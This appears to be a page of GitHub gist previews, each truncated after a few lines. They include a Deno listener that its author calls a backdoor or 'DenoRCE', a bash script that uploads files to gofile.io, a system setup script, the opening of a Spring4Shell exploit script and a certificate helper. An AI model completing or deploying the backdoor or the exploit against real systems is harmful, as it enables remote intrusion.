This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Denor -> Deno Door, refereing to a deno backdoor or just DenoRCE :wink: | |
const server = Deno.listen({ port: 8848 }); | |
var header = new Headers(); | |
header.append("Location", "/"); | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
export FPATH=$1; export URL="https://$(curl -s https://api.gofile.io/getServer | cut -d '"' -f 10).gofile.io/uploadFile" | |
export API_TOKEN=""; export ROOT_FOLDER_ID="" # Please insert your variables here from https://gofile to make folder creation possible on the server. | |
# INFO: TODO: Iterate over given arguments (Iterate than using $1). | |
if [ -f $FPATH ]; then | |
echo "[*] Uploading File -> $1" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo -e 'TERM="xterm-256color"' | cat - ~/.bashrc | tee .f && mv .f ~/.bashrc | |
echo -e "sudo zsh\n" | tee -a ~/.bashrc | |
sudo apt update && sudo apt remove libwacom2 -y | |
sudo apt upgrade -y && sudo apt autoremove -y | |
sudo apt install gdebi axel neofetch inetutils-ping mtr -y | |
exit |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# Spring4Shell Exploit | |
# Original Exploit: https://github.com/BobTheShoplifter/Spring4Shell-POC/ | |
# Modified by: AG | MuirlandOracle | |
# AGAIN Modified with fanciness by: Captain Nick Lucifer* (*pronounced Lucifer) @naryal2580 @c4p-n1ck | |
import urllib.parse, \ | |
requests, readline, \ | |
argparse, re | |
from string import printable |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
Tools for creating a CA cert and signed server certs. | |
Divined from http://svn.osafoundation.org/m2crypto/trunk/tests/test_x509.py | |
The mk_temporary_xxx calls return a NamedTemporaryFile with certs. | |
Usage ; | |
# Create a temporary CA cert and it's private key | |
cacert, cakey = mk_temporary_cacert() |